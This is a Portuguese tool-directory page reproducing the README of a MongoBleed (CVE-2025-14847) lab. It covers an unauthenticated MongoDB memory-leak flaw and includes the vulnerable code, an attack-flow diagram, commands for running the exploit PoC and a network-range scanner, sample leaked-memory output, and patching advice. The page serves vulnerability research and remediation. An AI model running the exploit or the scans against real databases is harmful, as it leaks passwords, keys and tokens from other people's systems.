Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
mongobleed-exploit-CVE-2025-14847 — Laboratório de exploração, docker e scanner de código para a vulnerabilidade mongobleed CVE-2025-14847, além de ferramentas de sincronização do Phoenix Security | Kitploit
Ferramentas/GitHubGitHub/security-phoenix-demo/mongobleed-exploit-cve-2025-14847
Scanners de VulnerabilidadesAnálise de CódigoExploraçãoAprendizado e EducaçãoSegurança de Banco de DadosLabs e Prática
GitHubsecurity-phoenix-demo/mongobleed-exploit-cve-2025-14847

mongobleed-exploit-CVE-2025-14847

Laboratório de exploração, docker e scanner de código para a vulnerabilidade mongobleed CVE-2025-14847, além de ferramentas de sincronização do Phoenix Security

Ver Repositório
1323há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🩸 MongoBleed - Laboratório de Pesquisa em Segurança CVE-2025-14847

Logo MongoBleed

CVE-2025-14847 | CVSS 8.7 (Alto) | Divulgação de Memória Não Autenticada

📖 Documentação Completa • 🔬 Análise Técnica • ⚡ Comandos Rápidos


🎯 Resumo do CVE-2025-14847

MongoBleed é uma vulnerabilidade crítica de divulgação de memória na camada de transporte de rede do MongoDB que permite que atacantes remotos não autenticados exfiltrem memória heap sensível sem qualquer credencial ou interação do usuário.

Impacto

CategoriaDescrição
Tipo de AtaqueDivulgação remota de memória não autenticada
Causa RaizA descompressão Zlib retorna o tamanho do buffer alocado em vez do comprimento real dos dados
Dados ExpostosSenhas de banco de dados, chaves de API, tokens de sessão, credenciais AWS, estado interno do servidor
GravidadeCVSS 8.7 (Alto) - Acessível pela rede, sem necessidade de autenticação
ExploraçãoExploração ativa observada em campo desde 28 de dezembro de 2025

Versões Vulneráveis (Resumo)

RamoVulnerávelCorrigidaAção
8.2.x8.2.0 → 8.2.28.2.3Atualize imediatamente
8.0.x8.0.0 → 8.0.168.0.17Atualize imediatamente
7.0.x7.0.0 → 7.0.277.0.28Atualize imediatamente
6.0.x6.0.0 → 6.0.266.0.27Atualize imediatamente
5.0.x5.0.0 → 5.0.315.0.32Atualize imediatamente
4.4.x4.4.0 → 4.4.294.4.30Atualize imediatamente
≤4.2.xTodas as versõesNenhuma⚠️ Fim de vida - Migre para versão suportada

📖 Veja a Tabela Completa de Versões Afetadas →

Escala de Exposição

  • 87.000 - 194.000 instâncias MongoDB publicamente expostas
  • 42% dos ambientes em nuvem hospedam instâncias vulneráveis (Pesquisa Wiz)
  • Nenhuma autenticação necessária - o ataque ocorre antes da autenticação
  • Exploração silenciosa - sem logs, sem travamentos

Resumo para Equipes de Engenharia

AspectoDetalhes
O que é vulnerávelCamada de transporte de rede do MongoDB usando compressão zlib
GravidadeAlto (CVSS 8.7/7.5)
ImpactoDivulgação remota e não autenticada de memória heap não inicializada
Por que é importanteFragmentos vazados contêm senhas de banco de dados, chaves secretas AWS e estados internos do servidor
Status do exploitProva de Conceito (PoC) pública "mongobleed" está validada e circulando
O que fazer hojeAtualize para versões corrigidas imediatamente ou desative a compressão zlib

🔬 Anatomia da Vulnerabilidade

Análise Técnica

A vulnerabilidade existe na camada de transporte de rede do MongoDB (message_compressor_zlib.cpp) onde uma falha crítica na lógica de descompressão zlib permite que atacantes não autenticados vazem memória sensível do servidor.

Causa Raiz

root@kitploit:~
// VULNERABLE CODE (before fix)
counterHitDecompress(input.length(), output.length());
return {output.length()};  // ❌ Returns ALLOCATED buffer size

// PATCHED CODE (after fix)  
counterHitDecompress(input.length(), output.length());
return length;             // ✅ Returns ACTUAL decompressed data length

Fluxo de Exploração

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────────┐
│                        MongoBleed Attack Vector                             │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                              │
│   ATTACKER                         VULNERABLE MongoDB                        │
│      │                                    │                                  │
│      │  1. Send OP_COMPRESSED message     │                                  │
│      │     uncompressedSize: 8192 (LIE)   │                                  │
│      │     actual data: ~100 bytes        │                                  │
│      │────────────────────────────────────>                                  │
│      │                                    │                                  │
│      │                          2. Allocate 8192-byte buffer                 │
│      │                          3. Decompress ~100 bytes                     │
│      │                          4. BUG: Return buffer.length() = 8192        │
│      │                          5. BSON parser reads uninitialized memory    │
│      │                                    │                                  │
│      │  6. Error response with leaked     │                                  │
│      │     memory as "field names"        │                                  │
│      │<────────────────────────────────────                                  │
│      │                                    │                                  │
│   🔓 LEAKED DATA:                         │                                  │
│      - API keys, passwords, tokens                                           │
│      - MongoDB internal state                                                │
│      - WiredTiger storage configs                                            │
│      - System /proc information                                              │
│      - Client connection data                                                │
│                                                                              │
└─────────────────────────────────────────────────────────────────────────────┘

Cronologia da Descoberta

DataEvento
15 dez 2025Vulnerabilidade identificada; ticket interno SERVER-115508
19 dez 2025Correção lançada, CVE-2025-14847 divulgado
24 dez 2025Frota MongoDB Atlas corrigida
26 dez 2025PoC pública "mongobleed" lançada
28 dez 2025Exploração observada em campo

🔬 Veja a Análise Técnica → para anatomia detalhada da vulnerabilidade, construção de exploit e métodos de detecção.

📁 Estrutura do Projeto

root@kitploit:~
mongobleed-exploit-CVE-2025-14847/
├── exploit/                    # 🔴 Laboratório de Exploração
│   ├── docker-compose.yml      # Instâncias MongoDB vulnerável + corrigida
│   ├── mongobleed.py           # PoC de exploit de vazamento de memória
│   ├── init/init-mongo.js      # Dados de teste sensíveis
│   ├── test-exploit.sh         # Script de teste do laboratório
│   └── README.md               # Documentação do laboratório
│
├── scanner/                    # 🌐 Scanner de Rede
│   ├── mongobleed_scanner.py   # Scanner de vulnerabilidade IP/domínio
│   ├── sample-targets.txt      # Arquivo de alvos de exemplo
│   └── README.md               # Documentação do scanner
│
├── code-scan/                  # 📂 Scanner de Código
│   ├── main.py                 # Ponto de entrada CLI
│   ├── scanners/               # Scanners Docker, Python, Infra
│   ├── models/                 # Modelos de Achado, Vulnerabilidade
│   ├── integrations/           # Upload Phoenix Security
│   └── README.md               # Documentação do scanner de código
│
└── original-exploit/           # 📚 Referência da PoC original

🚀 Início Rápido

1. Laboratório de Exploração

root@kitploit:~
cd exploit

# Start lab (vulnerable + patched instances)
docker-compose up -d
sleep 10

# Test vulnerable instance (should leak memory)
python3 mongobleed.py --host localhost --port 27017

# Test patched instance (should NOT leak memory)
python3 mongobleed.py --host localhost --port 27018

# Full lab test
./test-exploit.sh

2. Scanner de Rede

root@kitploit:~
cd scanner

# Scan single host
python3 mongobleed_scanner.py 192.168.1.100

# Scan network range
python3 mongobleed_scanner.py 192.168.1.0/24

# Scan from file
python3 mongobleed_scanner.py @sample-targets.txt --json --output results.json

3. Scanner de Código

root@kitploit:~
cd code-scan

# Scan project for vulnerable MongoDB versions
python3 main.py scan /path/to/project

# Scan and upload to Phoenix
python3 main.py scan /path/to/project --upload-phoenix

# Run tests
python3 main.py test

⚡ Comandos Rápidos

root@kitploit:~
# === EXPLOIT LAB ===
# Start lab
cd exploit && docker-compose up -d && sleep 10

# Run exploit (vulnerable instance)
python3 exploit/mongobleed.py --host localhost --port 27017

# Run exploit (patched instance - verify no leaks)
python3 exploit/mongobleed.py --host localhost --port 27018

# === NETWORK SCANNER ===
# Scan local lab
python3 scanner/mongobleed_scanner.py localhost:27017 localhost:27018

# Scan network
python3 scanner/mongobleed_scanner.py 192.168.1.0/24 --threads 20

# === CODE SCANNER ===
# Scan current directory
python3 code-scan/main.py scan .

# Scan with JSON output
python3 code-scan/main.py scan /path/to/project --json --output results.json

# Scan and upload to Phoenix
python3 code-scan/main.py scan /path/to/project --upload-phoenix

📊 Exemplos de Saída

Saída do Exploit

root@kitploit:~
[*] mongobleed - CVE-2025-14847 MongoDB Memory Leak
[*] Target: localhost:27017
[*] Scanning offsets 20-8192...

[+] offset=  117 len=  39: ssions^\u0001�r��*YDr���
[+] offset=16582 len=1552: MemAvailable:    8554792 kB\nBuffers: ...
[+] offset=18731 len=3908: MONGOBLEED_PRIVATE_KEY_DATA_123...

[!] TARGET IS VULNERABLE TO CVE-2025-14847
[*] Total leaked: 8748 bytes
[*] Unique fragments: 42

[!] Potential secrets detected:
    • RSA Private Key
    • Lab Secret

Saída do Scanner de Rede

root@kitploit:~
[*] Scanning 254 targets with 10 threads...

[1/254] 192.168.1.10:27017 - 8.2.2 [VULNERABLE - CONFIRMED]
[2/254] 192.168.1.11:27017 - 8.2.3 [SAFE]

SUMMARY:
----------------------------------------
Total targets scanned: 254
Reachable hosts:       12
MongoDB instances:     8
VULNERABLE:            3

Saída do Scanner de Código

root@kitploit:~
================================================================================
MONGOBLEED CODE SCANNER REPORT - CVE-2025-14847
================================================================================

🚨 VULNERABLE MONGODB VERSIONS DETECTED

1. [email protected]
   File: /project/docker-compose.yml
   Type: docker-compose
   Reason: Version 8.2.2 is in vulnerable range [8.2.0 - 8.2.2]
   ✅ Upgrade to: 8.2.3
   CVE: CVE-2025-14847

🛡️ Resumo de Remediação

PrioridadeAçãoDetalhes
🔴 1Atualizar MongoDBAtualize para versões corrigidas (8.2.3, 8.0.17, 7.0.28, 6.0.27, 5.0.32, 4.4.30)
🟠 2Desativar zlibmongod --setParameter networkMessageCompressors=snappy,zstd
🟡 3Isolamento de redeFirewall na porta 27017, use VPN/rede privada
🔵 4Rotacionar credenciaisSe exposto, rotacione todas as senhas de banco de dados, chaves de API, tokens

📖 Veja o Guia Completo de Remediação →


🔗 Integração com Phoenix Security

Todos os scanners suportam upload de achados para a plataforma Phoenix Security:

root@kitploit:~
# Create config
python3 code-scan/main.py create-config
cp .phoenix.config.TEMPLATE .phoenix.config

# Edit with your credentials
# [phoenix]
# client_id = your_client_id
# client_secret = your_client_secret
# api_base_url = https://api.securityphoenix.cloud

# Scan and upload
python3 code-scan/main.py scan /path/to/project --upload-phoenix

🔐 Aviso de Segurança

⚠️ IMPORTANTE: Este kit de ferramentas é fornecido apenas para fins autorizados de teste de segurança e pesquisa.

  • Teste apenas sistemas que você possui ou tem permissão explícita por escrito para testar
  • O acesso não autorizado a sistemas de computador é ilegal
  • Os dados vazados podem conter informações sensíveis - manuseie com responsabilidade
  • Reporte vulnerabilidades através dos canais de divulgação adequados

📚 Documentação

Documentação Principal

DocumentoDescrição
📖 DOCUMENTATION.mdDocumentação completa do projeto com configuração, uso e remediação
🔬 TECHNICAL_ANALYSIS.mdAnatomia aprofundada da vulnerabilidade, mecanismo de exploração e detecção
⚡ QUICK_COMMANDS.mdComandos prontos para copiar e colar para todas as ferramentas

Documentação das Ferramentas

FerramentaDocumentaçãoDescrição
🔴 Laboratório de Exploraçãoexploit/README.mdLaboratório MongoDB vulnerável/corrigido baseado em Docker
🌐 Scanner de Redescanner/README.mdScanner de vulnerabilidade IP/CIDR
📂 Scanner de Códigocode-scan/README.mdScanner de base de código para versões vulneráveis

🔗 Referências Externas

  • Aviso da OX Security
  • Commit de correção do MongoDB
  • Entrada NVD - CVE-2025-14847

👤 Créditos

  • Exploit original por Joe Desimone (@dez_)
  • Ambiente de laboratório e melhorias do scanner para pesquisa em segurança

📄 Licença

Apenas para testes de segurança autorizados. Use com responsabilidade.


Última Atualização: Dezembro de 2025

Baixar ferramenta